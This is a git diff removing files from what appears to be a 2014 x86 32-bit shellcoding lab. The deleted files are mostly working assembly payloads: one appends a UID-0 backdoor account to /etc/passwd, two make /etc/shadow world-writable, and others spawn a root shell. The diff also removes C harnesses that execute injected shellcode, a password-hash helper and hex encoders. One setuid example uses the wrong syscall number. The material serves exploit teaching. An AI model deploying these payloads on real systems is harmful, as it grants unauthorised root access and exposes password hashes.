diff --git a/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf b/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf deleted file mode 100644 index 691a7b2..0000000 Binary files a/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf and /dev/null differ diff --git a/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm b/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm deleted file mode 100644 index 2c47e1c..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm +++ /dev/null @@ -1,53 +0,0 @@ -; shellcode lab @ hack4 -; dash - -BITS 32 -global _start - -_start: -xor eax, eax -xor ebx, ebx -xor ecx, ecx - -mov eax, 5 -push ebx -push 0x64777373 -push 0x61702f63 -push 0x74652f2f -mov ebx, esp -mov ecx, 0x401 -int 0x80 - -; take filedescriptor -xor ebx, ebx -mov ebx, eax - -; write(f_open, line, 24) -xor eax, eax -xor ecx, ecx -mov eax, 4 - -push ecx -push byte 0x0a -push 0x68736162 -push 0x2f6e6962 -push 0x2f3a746f -push 0x6f722f3a -push 0x3a303a30 -push 0x3a494e73 -push 0x386b5a39 -push 0x65736d48 -push 0x42413a72 -push 0x336b6361 -push 0x68316f6e -mov ecx, esp -mov edx, 45 -int 0x80 - -;close maybe?? ah forget that :> - -; exit(23) -mov eax, 1 -mov ebx, 23 -int 0x80 - diff --git a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py deleted file mode 100644 index ef0e2e2..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python -# -# ascii converter for shellcoding-lab at hack4 -# ~dash in 2014 -# - -import sys -import binascii - -text = sys.argv[1] - -def usage(): - print "./%s " % (sys.argv[0]) -if len(sys.argv)<2: - usage() - exit() - -val = binascii.hexlify(text[::-1]) - -print "Stringlen: %d" % len(text) -print "String: %s" % val diff --git a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py deleted file mode 100644 index b169d52..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env python - -import sys -import binascii - -text = sys.argv[1] - -def usage(): - print "./%s " % (sys.argv[0]) -if len(sys.argv)<2: - usage() - exit() - -val = binascii.hexlify(text[::-1]) - -print "Stringlen: %d" % len(text) -print "String: %s" % val -print -for i in range(len(val)): - if i % 8 == 0: - print "push 0x", - - print "\b%c" % val[i], - i=i+1 - k = i % 8 - if k == 0: - print - - diff --git a/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm b/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm deleted file mode 100644 index 558f180..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm +++ /dev/null @@ -1,21 +0,0 @@ -global _start - -section .text -_start: - -;setuid -xor eax, eax -mov ebx, eax -mov eax, 11 -int 0x80 - -;execve -xor ecx, ecx -push ecx -push 0x69732f2f -push 0x6e69622f -mov ebx, esp -mov edx, 0x00000000 -xor eax, eax -mov eax, 11 -int 0x80 diff --git a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm deleted file mode 100644 index e5b7007..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm +++ /dev/null @@ -1,27 +0,0 @@ -; shellcodelab@hack4 -; by dash - -BITS 32 -global _start - -_start: -xor eax, eax -xor ebx, ebx -xor ecx, ecx - -;chmod -mov ecx, 0x1ff ;0777 -push ebx ;null terminator -push 0x776f6461 ;/etc/shadow -push 0x68732f63 -push 0x74652f2f -mov ebx, esp ;put the address of esp to ebx (shadow) -mov eax, 15 -int 0x80 - -;exit -xor eax, eax -xor ebx, ebx -mov eax, 1 -int 0x80 - diff --git a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm deleted file mode 100644 index 80127bc..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm +++ /dev/null @@ -1,26 +0,0 @@ -; shellcode-lab@hack4 -; by dash - -BITS 32 -global _start - -_start: -xor eax, eax -xor ebx, ebx -xor ecx, ecx - -;chmod -mov cx, 0x1ff ;0777 -push ebx ;null terminator -push 0x776f6461 ;/etc/shadow -push 0x68732f63 -push 0x74652f2f -mov ebx, esp ;put the address of esp to ebx (shadow) -mov al, 15 -int 0x80 - -;exit -xor eax, eax -xor ebx, ebx -mov al, 1 -int 0x80 diff --git a/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py b/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py deleted file mode 100644 index df68606..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python2 -# -# crypt des tool for shellcoding lab at hack4 -# ~dash - -import sys -import crypt - -def usage(): - print "%s " % (sys.argv[0]) - -if len(sys.argv)<2: - usage() - exit() - -password = sys.argv[1] -pw = crypt.crypt(password,'AB') -print "Password: %s" % pw - diff --git a/x86_32/0x1_SycallBasics/Example_Code/shell.c b/x86_32/0x1_SycallBasics/Example_Code/shell.c deleted file mode 100644 index ac0e9d0..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/shell.c +++ /dev/null @@ -1,20 +0,0 @@ -/* shell.c - simple shell for shellcoding-lab at hack4 0x1 - probably ripped somewhere - ~dash -*/ - -#include -#include -#include - - -int main(){ - - char *args[2]; - - setuid(0); - args[0] = "/bin/sh"; - args[1] = NULL; - execve(args[0], args, NULL); -} diff --git a/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c b/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c deleted file mode 100644 index d656446..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c +++ /dev/null @@ -1,26 +0,0 @@ -#include -#include - -char shellcode[] = ""; - -int main(int argc, char **argv) -{ - // Allocate some read-write memory - void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); - - // Copy the shellcode into the new memory - memcpy(mem, shellcode, sizeof(shellcode)); - - // Make the memory read-execute - mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC); - - // Call the shellcode - int (*func)(); - func = (int (*)())mem; - (int)(*func)(); - - // Now, if we managed to return here, it would be prudent to clean up the memory: - munmap(mem, sizeof(shellcode)); - - return 0; -} diff --git a/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c b/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c deleted file mode 100644 index cc3f9dc..0000000 --- a/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c +++ /dev/null @@ -1,15 +0,0 @@ -#include -#include -#include - -char shellcode[] = ""; - -int main(void) -{ - int *ret; - - printf("%d\n",strlen(shellcode)); - ret = (int *)&ret+2; - *ret = (int)shellcode; -return 0; -}